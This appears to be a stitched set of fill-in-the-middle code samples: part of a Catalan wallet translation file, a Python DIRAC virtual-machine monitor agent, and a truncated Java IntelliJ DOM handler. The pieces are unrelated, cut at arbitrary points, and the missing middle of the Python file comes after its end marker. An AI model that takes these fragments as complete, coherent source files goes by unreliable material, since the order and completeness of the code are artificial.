Això pot passar si alguna de les monedes del teu moneder ja s&apos;han gastat, com si haguessis usat una còpia de l&apos;arxiu wallet.dat i s&apos;haguessin gastat monedes de la còpia però sense marcar com gastades en aquest.</translation> </message> <message> <location line="+4"/> <source>Error: This transaction requires a transaction fee of at least %s because of its amount, complexity, or use of recently received funds!</source> <translation>Error: Aquesta transacció requereix una comissió d&apos;almenys %s degut al seu import, complexitat o per l&apos;ús de fons recentment rebuts!</translation> </message> <message> <location line="+3"/> <source>Execute command when a relevant alert is received (%s in cmd is replaced by message)</source> <translation>Executar ordre al rebre una alerta rellevant (%s al cmd es reemplaça per message)</translation> </message> <message> <location line="+3"/> <source>Execute command when a wallet transaction changes (%s in cmd is replaced by TxID)</source> <translation>Executar una ordre quan una transacció del moneder canviï (%s al cmd es reemplaça per TxID)</translation> </message> <message> <location line="+11"/> <source>Set maximum size of high-priority/low-fee transactions in bytes (default: 27000)</source> <translation>Establir una mida màxima de transaccions d&apos;alta prioritat/baixa comissió en bytes (per defecte: 27000)</translation> </message> <message> <location line="+6"/> <source>This is a pre-release test build - use at your own risk - do not use for mining or merchant applications</source> <translation>Aquesta és una versió de pre-llançament - utilitza-la sota la teva responsabilitat - No usar per a mineria o aplicacions de compra-venda</translation> </message> <message> <location line="+5"/> <source>Warning: -paytxfee is set very high! This is the transaction fee you will pay if you send a transaction.</source> <translation>Advertència: el -paytxfee és molt elevat! Aquesta és la comissió de transacció que pagaràs quan enviïs una transacció.</translation> </message> <message> <location line="+3"/> <source>Warning: Displayed transactions may not be correct! You may need to upgrade, or other nodes may need to upgrade.</source> <translation>Advertència: Les transaccions mostrades poden no ser correctes! Pot ésser que necessitis actualitzar, o bé que altres nodes ho necessitin.</translation> </message> <message> <location line="+3"/> <source>Warning: Please check that your computer&apos;s date and time are correct! If your clock is wrong Bitcoin will not work properly.</source> <translation>Advertència: Si us plau comprovi que la data i hora del seu ordinador siguin correctes! Si el seu rellotge està mal configurat, Badcoin no funcionarà de manera apropiada.</translation> </message> <message> <location line="+3"/> <source>Warning: error reading wallet.dat! All keys read correctly, but transaction data or address book entries might be missing or incorrect.</source> <translation>Advertència: Error llegint l&apos;arxiu wallet.dat! Totes les claus es llegeixen correctament, però hi ha dades de transaccions o entrades del llibre d&apos;adreces absents o bé són incorrectes.</translation> </message> <message> <location line="+3"/> <source>Warning: wallet.dat corrupt, data salvaged! Original wallet.dat saved as wallet.{timestamp}.bak in %s; if your balance or transactions are incorrect you should restore from a backup.</source> <translation>Advertència: L&apos;arxiu wallet.dat és corrupte, dades rescatades!
L&apos;arxiu wallet.dat original ha estat desat com wallet.{timestamp}.bak al directori %s; si el teu balanç o transaccions són incorrectes hauries de restaurar-lo d&apos;una còpia de seguretat.</translation> </message> <message> <location line="+14"/> <source>Attempt to recover private keys from a corrupt wallet.dat</source> <translation>Intentar recuperar les claus privades d&apos;un arxiu wallet.dat corrupte</translation> </message> <message> <location line="+2"/> <source>Block creation options:</source> <translation>Opcions de la creació de blocs:</translation> </message> <message> <location line="+5"/> <source>Connect only to the specified node(s)</source> <translation>Connectar només al(s) node(s) especificats</translation> </message> <message> <location line="+3"/> <source>Corrupted block database detected</source> <translation>S&apos;ha detectat una base de dades de blocs corrupta</translation> </message> <message> <location line="+1"/> <source>Discover own IP address (default: 1 when listening and no -externalip)</source> <translation>Descobrir la pròpia adreça IP (per defecte: 1 quan s&apos;escolta i no hi ha -externalip)</translation> </message> <message> <location line="+1"/> <source>Do you want to rebuild the block database now?</source> <translation>Vols reconstruir la base de dades de blocs ara?</translation> </message> <message> <location line="+2"/> <source>Error initializing block database</source> <translation>Error inicialitzant la base de dades de blocs</translation> </message> <message> <location line="+1"/> <source>Error initializing wallet database environment %s!</source> <translation>Error inicialitzant l&apos;entorn de la base de dades del moneder %s!</translation> </message> <message> <location line="+1"/> <source>Error loading block database</source> <translation>Error carregant la base de dades de blocs</translation> </message> <message> <location line="+4"/> <source>Error opening block database</source> <translation>Error obrint la base de dades de blocs</translation> </message> <message> <location line="+2"/> <source>Error: Disk space is low!</source> <translation>Error: Poc espai al disc!</translation> </message> <message> <location line="+1"/> <source>Error: Wallet locked, unable to create transaction!</source> <translation>Error: El moneder està blocat, no és possible crear la transacció!</translation> </message> <message> <location line="+1"/> <source>Error: system error: </source> <translation>Error: error de sistema: </translation> </message> <message> <location line="+1"/> <source>Failed to listen on any port. Use -listen=0 if you want this.</source> <translation>Ha fallat escoltar en qualsevol port.
Utilitza -listen=0 si vols això.</translation> </message> <message> <location line="+1"/> <source>Failed to read block info</source> <translation>Ha fallat la lectura de la informació del bloc</translation> </message> <message> <location line="+1"/> <source>Failed to read block</source> <translation>Ha fallat la lectura del bloc</translation> </message> <message> <location line="+1"/> <source>Failed to sync block index</source> <translation>Ha fallat la sincronització de l&apos;índex de blocs</translation> </message> <message> <location line="+1"/> <source>Failed to write block index</source> <translation>Ha fallat l&apos;escriptura de l&apos;índex de blocs</translation> </message> <message> <location line="+1"/> <source>Failed to write block info</source> <translation>Ha fallat l&apos;escriptura de la informació de bloc</translation> </message> <message> <location line="+1"/> <source>Failed to write block</source> <translation>Ha fallat l&apos;escriptura del bloc</translation> </message> <message> <location line="+1"/> <source>Failed to write file info</source> <translation>Ha fallat l&apos;escriptura de la informació d&apos;arxiu</translation> </message> <message> <location line="+1"/> <source>Failed to write to coin database</source> <translation>Ha fallat l&apos;escriptura de la base de dades de monedes</translation> </message> <message> <location line="+1"/> <source>Failed to write transaction index</source> <translation>Ha fallat l&apos;escriptura de l&apos;índex de transaccions</translation> </message> <message> <location line="+1"/> <source>Failed to write undo data</source> <translation>Ha fallat l&apos;escriptura de les dades de desfer</translation> </message> <message> <location line="+2"/> <source>Find peers using DNS lookup (default: 1 unless -connect)</source> <translation>Cerca punts de connexió usant rastreig de DNS (per defecte: 1 tret d&apos;usar -connect)</translation> </message> <message> <location line="+1"/> <source>Generate coins (default: 0)</source> <translation type="unfinished"/> </message> <message> <location line="+2"/> <source>How many blocks to check at startup (default: 288, 0 = all)</source> <translation>Quants blocs s&apos;han de comprovar a l&apos;inici (per defecte: 288, 0 = tots)</translation> </message> <message> <location line="+1"/> <source>How thorough the block verification is (0-4, default: 3)</source> <translation>Com d&apos;exhaustiva és la verificació de blocs (0-4, per defecte: 3)</translation> </message> <message> <location line="+19"/> <source>Not enough file descriptors available.</source> <translation type="unfinished"/> </message> <message> <location line="+8"/> <source>Rebuild block chain index from current blk000??.dat files</source> <translation>Reconstruir l&apos;índex de la cadena de blocs dels arxius actuals blk000??.dat</translation> </message> <message> <location line="+16"/> <source>Set the number of threads to service RPC calls (default: 4)</source> <translation>Estableix el nombre de fils per atendre crides RPC (per defecte: 4)</translation> </message> <message> <location line="+26"/> <source>Verifying blocks...</source> <translation>Verificant blocs...</translation> </message> <message> <location line="+1"/> <source>Verifying wallet...</source> <translation>Verificant moneder...</translation> </message> <message> <location line="-69"/> <source>Imports blocks from external blk000??.dat file</source> <translation>Importa blocs d&apos;un fitxer blk000??.dat extern</translation> </message> <message> <location line="-76"/> <source>Set the number of script verification threads (up to 16, 0 = auto,
&lt;0 = leave that many cores free, default: 0)</source> <translation type="unfinished"/> </message> <message> <location line="+77"/> <source>Information</source> <translation>Informació</translation> </message> <message> <location line="+3"/> <source>Invalid -tor address: &apos;%s&apos;</source> <translation>Adreça -tor invàlida: &apos;%s&apos;</translation> </message> <message> <location line="+1"/> <source>Invalid amount for -minrelaytxfee=&lt;amount&gt;: &apos;%s&apos;</source> <translation type="unfinished"/> </message> <message> <location line="+1"/> <source>Invalid amount for -mintxfee=&lt;amount&gt;: &apos;%s&apos;</source> <translation type="unfinished"/> </message> <message> <location line="+8"/> <source>Maintain a full transaction index (default: 0)</source> <translation>Mantenir un índex complet de transaccions (per defecte: 0)</translation> </message> <message> <location line="+2"/> <source>Maximum per-connection receive buffer, &lt;n&gt;*1000 bytes (default: 5000)</source> <translation>Mida màxima del buffer de recepció per a cada connexió, &lt;n&gt;*1000 bytes (per defecte: 5000)</translation> </message> <message> <location line="+1"/> <source>Maximum per-connection send buffer, &lt;n&gt;*1000 bytes (default: 1000)</source> <translation>Mida màxima del buffer d&apos;enviament per a cada connexió, &lt;n&gt;*1000 bytes (per defecte: 1000)</translation> </message> <message> <location line="+2"/> <source>Only accept block chain matching built-in checkpoints (default: 1)</source> <translation>Tan sols acceptar cadenes de blocs que coincideixin amb els punts de control integrats (per defecte: 1)</translation> </message> <message> <location line="+1"/> <source>Only connect to nodes in network &lt;net&gt; (IPv4, IPv6 or Tor)</source> <translation>Només connectar als nodes de la xarxa &lt;net&gt; (IPv4, IPv6 o Tor)</translation> </message> <message> <location line="+2"/> <source>Output extra debugging information. Implies all other -debug* options</source> <translation>Sortida de la informació extra de debugging.
Implica totes les altres opcions -debug*</translation> </message> <message> <location line="+1"/> <source>Output extra network debugging information</source> <translation>Sortida de la informació extra de debugging de xarxa</translation> </message> <message> <location line="+2"/> <source>Prepend debug output with timestamp</source> <translation>Anteposar estampa temporal a les dades de debug</translation> </message> <message> <location line="+5"/> <source>SSL options: (see the Bitcoin Wiki for SSL setup instructions)</source> <translation>Opcions SSL: (veure la Wiki de Badcoin per a instruccions de configuració SSL)</translation> </message> <message> <location line="+1"/> <source>Select the version of socks proxy to use (4-5, default: 5)</source> <translation>Selecciona la versió de socks proxy a utilitzar (4-5, per defecte: 5)</translation> </message> <message> <location line="+3"/> <source>Send trace/debug info to console instead of debug.log file</source> <translation>Enviar informació de traça/debug a la consola en comptes de l&apos;arxiu debug.log</translation> </message> <message> <location line="+1"/> <source>Send trace/debug info to debugger</source> <translation>Enviar informació de traça/debug a un debugger</translation> </message> <message> <location line="+5"/> <source>Set maximum block size in bytes (default: 250000)</source> <translation>Establir una mida màxima de bloc en bytes (per defecte: 250000)</translation> </message> <message> <location line="+1"/> <source>Set minimum block size in bytes (default: 0)</source> <translation>Establir una mida mínima de bloc en bytes (per defecte: 0)</translation> </message> <message> <location line="+2"/> <source>Shrink debug.log file on client startup (default: 1 when no -debug)</source> <translation>Reduir l&apos;arxiu debug.log a l&apos;iniciar el client (per defecte: 1 quan no -debug)</translation> </message> <message> <location line="+1"/> <source>Signing transaction failed</source> <translation type="unfinished"/> </message> <message> <location line="+2"/> <source>Specify connection timeout in milliseconds (default: 5000)</source> <translation>Especificar el temps límit per a un intent de connexió en mil·lisegons (per defecte: 5000)</translation> </message> <message> <location line="+4"/> <source>System error: </source> <translation>Error de sistema: </translation> </message> <message> <location line="+4"/> <source>Transaction amount too small</source> <translation type="unfinished"/> </message> <message> <location line="+1"/> <source>Transaction amounts must be positive</source> <translation type="unfinished"/> </message> <message> <location line="+1"/> <source>Transaction too large</source> <translation type="unfinished"/> </message> <message> <location line="+7"/> <source>Use UPnP to map the listening port (default: 0)</source> <translation>Utilitza UPnP per a mapejar el port d&apos;escolta (per defecte: 0)</translation> </message> <message> <location line="+1"/> <source>Use UPnP to map the listening port (default: 1 when listening)</source> <translation>Utilitza UPnP per a mapejar el port d&apos;escolta (per defecte: 1 quan s&apos;escolta)</translation> </message> <message> <location line="+1"/> <source>Use proxy to reach tor hidden services (default: same as -proxy)</source> <translation>Utilitzar proxy per arribar als serveis tor amagats (per defecte: el mateix que -proxy)</translation> </message> <message> <location line="+2"/> <source>Username for JSON-RPC connections</source> <translation>Nom d&apos;usuari per a connexions
JSON-RPC</translation> </message> <message> <location line="+4"/> <source>Warning</source> <translation>Avís</translation> </message> <message> <location line="+1"/> <source>Warning: This version is obsolete, upgrade required!</source> <translation>Advertència: Aquetsa versió està obsoleta, és necessari actualitzar!</translation> </message> <message> <location line="+1"/> <source>You need to rebuild the databases using -reindex to change -txindex</source> <translation>Necessiteu reconstruir les bases de dades usant -reindex per canviar -txindex</translation> </message> <message> <location line="+1"/> <source>wallet.dat corrupt, salvage failed</source> <translation>L&apos;arxiu wallet.data és corrupte, el rescat de les dades ha fallat</translation> </message> <message> <location line="-50"/> <source>Password for JSON-RPC connections</source> <translation>Contrasenya per a connexions JSON-RPC</translation> </message> <message> <location line="-67"/> <source>Allow JSON-RPC connections from specified IP address</source> <translation>Permetre connexions JSON-RPC d&apos;adreces IP específiques</translation> </message> <message> <location line="+76"/> <source>Send commands to node running on &lt;ip&gt; (default: 127.0.0.1)</source> <translation>Enviar ordre al node en execució a &lt;ip&gt; (per defecte: 127.0.0.1)</translation> </message> <message> <location line="-120"/> <source>Execute command when the best block changes (%s in cmd is replaced by block hash)</source> <translation>Executar orde quan el millor bloc canviï (%s al cmd es reemplaça per un bloc de hash)</translation> </message> <message> <location line="+147"/> <source>Upgrade wallet to latest format</source> <translation>Actualitzar moneder a l&apos;últim format</translation> </message> <message> <location line="-21"/> <source>Set key pool size to &lt;n&gt; (default: 100)</source> <translation>Establir límit de nombre de claus a &lt;n&gt; (per defecte: 100)</translation> </message> <message> <location line="-12"/> <source>Rescan the block chain for missing wallet transactions</source> <translation>Re-escanejar cadena de blocs en cerca de transaccions de moneder perdudes</translation> </message> <message> <location line="+35"/> <source>Use OpenSSL (https) for JSON-RPC connections</source> <translation>Utilitzar OpenSSL (https) per a connexions JSON-RPC</translation> </message> <message> <location line="-26"/> <source>Server certificate file (default: server.cert)</source> <translation>Arxiu del certificat de servidor (per defecte: server.cert)</translation> </message> <message> <location line="+1"/> <source>Server private key (default: server.pem)</source> <translation>Clau privada del servidor (per defecte: server.pem)</translation> </message> <message> <location line="-151"/> <source>Acceptable ciphers (default: TLSv1+HIGH:!SSLv2:!aNULL:!eNULL:!AH:!3DES:@STRENGTH)</source> <translation>Xifrats acceptats (per defecte: TLSv1+HIGH:!SSLv2:!aNULL:!eNULL:!AH:!3DES:@STRENGTH)</translation> </message> <message> <location line="+165"/> <source>This help message</source> <translation>Aquest misatge d&apos;ajuda</translation> </message> <message> <location line="+6"/> <source>Unable to bind to %s on this computer (bind returned error %d, %s)</source> <translation>Impossible d&apos;unir %s a aquest ordinador (s&apos;ha retornat l&apos;error %d, %s)</translation> </message> <message> <location line="-91"/> <source>Connect through socks proxy</source> <translation>Connectar a través de socks proxy</translation> </message> <message> <location 
line="-10"/> <source>Allow DNS lookups for -addnode, -seednode and -connect</source> <translation>Permetre consultes DNS per a -addnode, -seednode i -connect</translation> </message> <message> <location line="+55"/> <source>Loading addresses...</source> <translation>Carregant adreces...</translation> </message> <message> <location line="-35"/> <source>Error loading wallet.dat: Wallet corrupted</source> <translation>Error carregant wallet.dat: Moneder corrupte</translation> </message> <message> <location line="+1"/> <source>Error loading wallet.dat: Wallet requires newer version of Bitcoin</source> <translation>Error carregant wallet.dat: El moneder requereix una versió de Badcoin més moderna</translation> </message> <message> <location line="+93"/> <source>Wallet needed to be rewritten: restart Bitcoin to complete</source> <translation>El moneder necesita ser re-escrit: re-inicia Badcoin per a completar la tasca</translation> </message> <message> <location line="-95"/> <source>Error loading wallet.dat</source> <translation>Error carregant wallet.dat</translation> </message> <message> <location line="+28"/> <source>Invalid -proxy address: &apos;%s&apos;</source> <translation>Adreça -proxy invalida: &apos;%s&apos;</translation> </message> <message> <location line="+56"/> <source>Unknown network specified in -onlynet: &apos;%s&apos;</source> <translation>Xarxa desconeguda especificada a -onlynet: &apos;%s&apos;</translation> </message> <message> <location line="-1"/> <source>Unknown -socks proxy version requested: %i</source> <translation>S&apos;ha demanat una versió desconeguda de -socks proxy: %i</translation> </message> <message> <location line="-96"/> <source>Cannot resolve -bind address: &apos;%s&apos;</source> <translation>No es pot resoldre l&apos;adreça -bind: &apos;%s&apos;</translation> </message> <message> <location line="+1"/> <source>Cannot resolve -externalip address: &apos;%s&apos;</source> <translation>No es pot resoldre l&apos;adreça -externalip: &apos;%s&apos;</translation> </message> <message> <location line="+44"/> <source>Invalid amount for -paytxfee=&lt;amount&gt;: &apos;%s&apos;</source> <translation>Quantitat invalida per a -paytxfee=&lt;amount&gt;: &apos;%s&apos;</translation> </message> <message> <location line="+1"/> <source>Invalid amount</source> <translation>Quanitat invalida</translation> </message> <message> <location line="-6"/> <source>Insufficient funds</source> <translation>Balanç insuficient</translation> </message> <message> <location line="+10"/> <source>Loading block index...</source> <translation>Carregant índex de blocs...</translation> </message> <message> <location line="-57"/> <source>Add a node to connect to and attempt to keep the connection open</source> <translation>Afegir un node per a connectar&apos;s-hi i intentar mantenir la connexió oberta</translation> </message> <message> <location line="-25"/> <source>Unable to bind to %s on this computer. Bitcoin is probably already running.</source> <translation>Impossible d&apos;unir %s en aquest ordinador. 
Probablement Badcoin ja estigui en execució.</translation> </message> <message> <location line="+64"/> <source>Fee per KB to add to transactions you send</source> <translation>Comisió a afegir per cada KB de transaccions que enviïs</translation> </message> <message> <location line="+19"/> <source>Loading wallet...</source> <translation>Carregant moneder...</translation> </message> <message> <location line="-52"/> <source>Cannot downgrade wallet</source> <translation>No es pot reduir la versió del moneder</translation> </message> <message> <location line="+3"/> <source>Cannot write default address</source> <translation>No es pot escriure l&apos;adreça per defecte</translation> </message> <message> <location line="+64"/> <source>Rescanning...</source> <translation>Re-escanejant...</translation> </message> <message> <location line="-57"/> <source>Done loading</source> <translation>Càrrega acabada</translation> </message> <message> <location line="+82"/> <source>To use the %s option</source> <translation>Utilitza la opció %s</translation> </message> <message> <location line="-74"/> <source>Error</source> <translation>Error</translation> </message> <message> <location line="-31"/> <source>You must set rpcpassword=&lt;password&gt; in the configuration file: %s If the file does not exist, create it with owner-readable-only file permissions.</source> <translation>Has de configurar el rpcpassword=&lt;password&gt; a l&apos;arxiu de configuració:\n %s\n Si l&apos;arxiu no existeix, crea&apos;l amb els permís owner-readable-only.</translation> </message> </context> </TS><|fim▁end|>
</message>
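The row above is a Qt Linguist .ts catalogue; a minimal standalone Python sketch like the following can list its unfinished entries with only the standard library. The file name 'bitcoin_ca.ts' is a placeholder and not taken from the row.

import xml.etree.ElementTree as ET

def untranslated_messages(ts_path):
    """Yield source strings whose <translation> is missing or marked unfinished."""
    tree = ET.parse(ts_path)
    for message in tree.getroot().iter('message'):
        source = message.find('source')
        translation = message.find('translation')
        if source is None:
            continue
        if translation is None or translation.get('type') == 'unfinished':
            yield source.text

if __name__ == '__main__':
    for text in untranslated_messages('bitcoin_ca.ts'):
        print(text)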
<|file_name|>VirtualMachineMonitorAgent.py<|end_file_name|><|fim▁begin|>""" VirtualMachineMonitorAgent plays the role of the watch dog for the Virtual Machine """ import os import time import glob # DIRAC from DIRAC import S_OK, S_ERROR, gConfig, rootPath from DIRAC.ConfigurationSystem.Client.Helpers import Operations from DIRAC.Core.Base.AgentModule import AgentModule from DIRAC.Core.Utilities import List, Network # VMDIRAC from VMDIRAC.WorkloadManagementSystem.Client.ServerUtils import virtualMachineDB __RCSID__ = "$Id$" class VirtualMachineMonitorAgent( AgentModule ): def __getCSConfig( self ): if not self.runningPod: return S_ERROR( "/LocalSite/RunningPod is not defined" ) #Variables coming from the vm imgPath = "/Cloud/%s" % self.runningPod for csOption, csDefault, varName in ( ( "MinWorkingLoad", 0.01, "vmMinWorkingLoad" ), ( "LoadAverageTimespan", 60, "vmLoadAvgTimespan" ), ( "HaltPeriod", 600, "haltPeriod" ), ( "HaltBeforeMargin", 300, "haltBeforeMargin" ), ( "HeartBeatPeriod", 300, "heartBeatPeriod" ), ): path = "%s/%s" % ( imgPath, csOption ) value = self.op.getValue( path, csDefault ) if not value > 0: return S_ERROR( "%s has an incorrect value, must be > 0" % path ) setattr( self, varName, value ) for csOption, csDefault, varName in ( ( "JobWrappersLocation", "/scratch", "vmJobWrappersLocation" ), ): path = "%s/%s" % ( imgPath, csOption ) value = gConfig.getValue( path, csDefault ) if not value : return S_ERROR( "%s points to an empty string, cannot be!" % path ) setattr( self, varName, value ) self.haltBeforeMargin = max( self.haltBeforeMargin, int( self.am_getPollingTime() ) + 5 ) self.haltPeriod = max( self.haltPeriod, int( self.am_getPollingTime() ) + 5 ) self.heartBeatPeriod = max( self.heartBeatPeriod, int( self.am_getPollingTime() ) + 5 ) self.log.info( "** VM Info **" ) self.log.info( "Name : %s" % self.runningPod ) self.log.info( "Min Working Load : %f" % self.vmMinWorkingLoad ) self.log.info( "Load Avg Timespan : %d" % self.vmLoadAvgTimespan ) self.log.info( "Job wrappers location : %s" % self.vmJobWrappersLocation ) self.log.info( "Halt Period : %d" % self.haltPeriod ) self.log.info( "Halt Before Margin : %d" % self.haltBeforeMargin ) self.log.info( "HeartBeat Period : %d" % self.heartBeatPeriod ) if self.vmID: self.log.info( "DIRAC ID : %s" % self.vmID ) if self.uniqueID: self.log.info( "Unique ID : %s" % self.uniqueID ) self.log.info( "*************" ) return S_OK() def __declareInstanceRunning( self ): #Connect to VM monitor and register as running retries = 3 sleepTime = 30 for i in range( retries ): result = virtualMachineDB.declareInstanceRunning( self.uniqueID, self.ipAddress ) if result[ 'OK' ]: self.log.info( "Declared instance running" ) return result self.log.error( "Could not declare instance running", result[ 'Message' ] ) if i < retries - 1 : self.log.info( "Sleeping for %d seconds and retrying" % sleepTime ) time.sleep( sleepTime ) return S_ERROR( "Could not declare instance running after %d retries" % retries ) def initialize( self ): self.am_disableMonitoring() #Init vars self.runningPod = gConfig.getValue( '/LocalSite/RunningPod' ) self.log.info( "Running pod name of the image is %s" % self.runningPod ) self.vmID = gConfig.getValue( '/LocalSite/VMID' ) self.__loadHistory = [] self.vmMinWorkingLoad = None self.vmLoadAvgTimespan = None self.vmJobWrappersLocation = None self.haltPeriod = None self.haltBeforeMargin = None self.heartBeatPeriod = None self.am_setOption( "MaxCycles", 0 ) self.am_setOption( "PollingTime", 60 ) #Discover net address netData 
= Network.discoverInterfaces() for iface in sorted( netData ): if iface.find( "eth" ) == 0: self.ipAddress = netData[ iface ][ 'ip' ] break self.log.info( "IP Address is %s" % self.ipAddress ) #getting the stop policy self.op = Operations.Operations() self.vmStopPolicy = self.op.getValue( "Cloud/%s/VMStopPolicy", 'elastic' ) self.log.info( "vmStopPolicy is %s" % self.vmStopPolicy ) #Declare instance running self.uniqueID = '' result = virtualMachineDB.getUniqueIDByName( self.vmID ) if result['OK']: self.uniqueID = result['Value']<|fim▁hole|> return S_ERROR( "Halting!" ) self.__instanceInfo = result[ 'Value' ] #Get the cs config result = self.__getCSConfig() if not result[ 'OK' ]: return result return S_OK() def __getLoadAvg( self ): result = self.__getCSConfig() if not result[ 'OK' ]: return result with open( "/proc/loadavg", "r" ) as fd: data = [ float( v ) for v in List.fromChar( fd.read(), " " )[:3] ] self.__loadHistory.append( data ) numRequiredSamples = max( self.vmLoadAvgTimespan / self.am_getPollingTime(), 1 ) while len( self.__loadHistory ) > numRequiredSamples: self.__loadHistory.pop( 0 ) self.log.info( "Load averaged over %d seconds" % self.vmLoadAvgTimespan ) self.log.info( " %d/%s required samples to average load" % ( len( self.__loadHistory ), numRequiredSamples ) ) avgLoad = 0 for f in self.__loadHistory: avgLoad += f[0] return avgLoad / len( self.__loadHistory ), len( self.__loadHistory ) == numRequiredSamples def __getNumJobWrappers( self ): if not os.path.isdir( self.vmJobWrappersLocation ): return 0 self.log.info( "VM job wrappers path: %s" % self.vmJobWrappersLocation ) jdlList = glob.glob( os.path.join( self.vmJobWrappersLocation, "*", "*.jdl" ) ) return len( jdlList ) def execute( self ): #Get load avgLoad, avgRequiredSamples = self.__getLoadAvg() self.log.info( "Load Average is %.2f" % avgLoad ) if not avgRequiredSamples: self.log.info( " Not all required samples yet there" ) #Do we need to send heartbeat? with open( "/proc/uptime" ) as fd: uptime = float( List.fromChar( fd.read().strip(), " " )[0] ) hours = int( uptime / 3600 ) minutes = int( uptime - hours * 3600 ) / 60 seconds = uptime - hours * 3600 - minutes * 60 self.log.info( "Uptime is %.2f (%d:%02d:%02d)" % ( uptime, hours, minutes, seconds ) ) #Num jobs numJobs = self.__getNumJobWrappers() self.log.info( "There are %d job wrappers" % numJobs ) if uptime % self.heartBeatPeriod <= self.am_getPollingTime(): #Heartbeat time! self.log.info( "Sending hearbeat..." ) result = virtualMachineDB.instanceIDHeartBeat( self.uniqueID, avgLoad, numJobs, 0, 0, ) status = None if result[ 'OK' ]: self.log.info( " heartbeat sent!" ) status = result['Value'] else: if "Transition" in result["Message"]: self.log.error( "Error on service:", result[ 'Message' ] ) status = result['State'] else: self.log.error("Connection error", result["Message"]) if status: self.__processHeartBeatMessage( status, avgLoad ) #Do we need to check if halt? if avgRequiredSamples and uptime % self.haltPeriod + self.haltBeforeMargin > self.haltPeriod: self.log.info( "Load average is %s (minimum for working instance is %s)" % ( avgLoad, self.vmMinWorkingLoad ) ) #current stop polices: elastic (load) and never if self.vmStopPolicy == 'elastic': #If load less than X, then halt! 
if avgLoad < self.vmMinWorkingLoad: self.__haltInstance( avgLoad ) if self.vmStopPolicy == 'never': self.log.info( "VM stop policy is defined as never (until SaaS or site request)") return S_OK() def __processHeartBeatMessage( self, hbMsg, avgLoad = 0.0 ): if hbMsg == 'stop': #Write stop file for jobAgent self.log.info( "Received STOP signal. Writing stop files..." ) for agentName in [ "WorkloadManagement/JobAgent" ]: ad = os.path.join( *agentName.split( "/" ) ) stopDir = os.path.join( gConfig.getValue( '/LocalSite/InstancePath', rootPath ), 'control', ad ) stopFile = os.path.join( stopDir, "stop_agent" ) try: if not os.path.isdir( stopDir ): os.makedirs( stopDir ) fd = open( stopFile, "w" ) fd.write( "stop!" ) fd.close() self.log.info( "Wrote stop file %s for agent %s" % ( stopFile, agentName ) ) except Exception, e: self.log.error( "Could not write stop agent file", stopFile ) if hbMsg == 'halt': self.__haltInstance( avgLoad ) def __haltInstance( self, avgLoad = 0.0 ): self.log.info( "Halting instance..." ) retries = 3 sleepTime = 10 for i in range( retries ): result = virtualMachineDB.declareInstanceHalting( self.uniqueID, avgLoad ) if result[ 'OK' ]: self.log.info( "Declared instance halting" ) break self.log.error( "Could not send halting state:", result[ 'Message' ] ) if i < retries - 1 : self.log.info( "Sleeping for %d seconds and retrying" % sleepTime ) time.sleep( sleepTime ) #self.log.info( "Executing system halt..." ) #os.system( "halt" )<|fim▁end|>
    result = self.__declareInstanceRunning()
    if not result[ 'OK' ]:
      self.log.error( "Could not declare instance running", result[ 'Message' ] )
      self.__haltInstance()
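The completion above leans on the same retry-with-sleep pattern that __declareInstanceRunning() and __haltInstance() use elsewhere in this agent. A minimal sketch of that pattern on its own, with all names assumed rather than taken from VMDIRAC; 'call' stands in for any function returning a DIRAC-style S_OK/S_ERROR dict:

import time

def retry_call(call, retries=3, sleep_time=30, log=None):
    """Invoke 'call' until it returns an OK result dict or the retry budget runs out."""
    for attempt in range(retries):
        result = call()
        if result.get('OK'):
            return result
        if log is not None:
            log.error("Attempt %d failed: %s" % (attempt + 1, result.get('Message')))
        if attempt < retries - 1:
            time.sleep(sleep_time)
    return {'OK': False, 'Message': 'Failed after %d retries' % retries}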
<|file_name|>DomRootInvocationHandler.java<|end_file_name|><|fim▁begin|>package com.intellij.util.xml.impl; import com.intellij.openapi.diagnostic.Logger; import com.intellij.openapi.util.NullableFactory; import com.intellij.openapi.util.text.StringUtil; import com.intellij.psi.XmlElementFactory; import com.intellij.psi.xml.XmlDocument; import com.intellij.psi.xml.XmlFile; import com.intellij.psi.xml.XmlTag; import com.intellij.util.IncorrectOperationException; import com.intellij.util.xml.DomElement; import com.intellij.util.xml.DomFileElement; import com.intellij.util.xml.DomNameStrategy; import com.intellij.util.xml.EvaluatedXmlName; import com.intellij.util.xml.stubs.ElementStub; import org.jetbrains.annotations.NonNls; import javax.annotation.Nonnull; import javax.annotation.Nullable; import java.util.List; /** * @author peter */ public class DomRootInvocationHandler extends DomInvocationHandler<AbstractDomChildDescriptionImpl, ElementStub> { private static final Logger LOG = Logger.getInstance("#com.intellij.util.xml.impl.DomRootInvocationHandler"); private final DomFileElementImpl<?> myParent; <|fim▁hole|> public DomRootInvocationHandler(final Class aClass, final RootDomParentStrategy strategy, @Nonnull final DomFileElementImpl fileElement, @Nonnull final EvaluatedXmlName tagName, @Nullable ElementStub stub ) { super(aClass, strategy, tagName, new AbstractDomChildDescriptionImpl(aClass) { @Nonnull public List<? extends DomElement> getValues(@Nonnull final DomElement parent) { throw new UnsupportedOperationException(); } public int compareTo(final AbstractDomChildDescriptionImpl o) { throw new UnsupportedOperationException(); } }, fileElement.getManager(), true, stub); myParent = fileElement; } public void undefineInternal() { try { final XmlTag tag = getXmlTag(); if (tag != null) { deleteTag(tag); detach(); fireUndefinedEvent(); } } catch (Exception e) { LOG.error(e); } } public boolean equals(final Object obj) { if (!(obj instanceof DomRootInvocationHandler)) return false; final DomRootInvocationHandler handler = (DomRootInvocationHandler)obj; return myParent.equals(handler.myParent); } public int hashCode() { return myParent.hashCode(); } @Nonnull public String getXmlElementNamespace() { return getXmlName().getNamespace(getFile(), getFile()); } @Override protected String checkValidity() { final XmlTag tag = (XmlTag)getXmlElement(); if (tag != null && !tag.isValid()) { return "invalid root tag"; } final String s = myParent.checkValidity(); if (s != null) { return "root: " + s; } return null; } @Nonnull public DomFileElementImpl getParent() { return myParent; } public DomElement createPathStableCopy() { final DomFileElement stableCopy = myParent.createStableCopy(); return getManager().createStableValue(new NullableFactory<DomElement>() { public DomElement create() { return stableCopy.isValid() ? stableCopy.getRootElement() : null; } }); } protected XmlTag setEmptyXmlTag() { final XmlTag[] result = new XmlTag[]{null}; getManager().runChange(new Runnable() { public void run() { try { final String namespace = getXmlElementNamespace(); @NonNls final String nsDecl = StringUtil.isEmpty(namespace) ? 
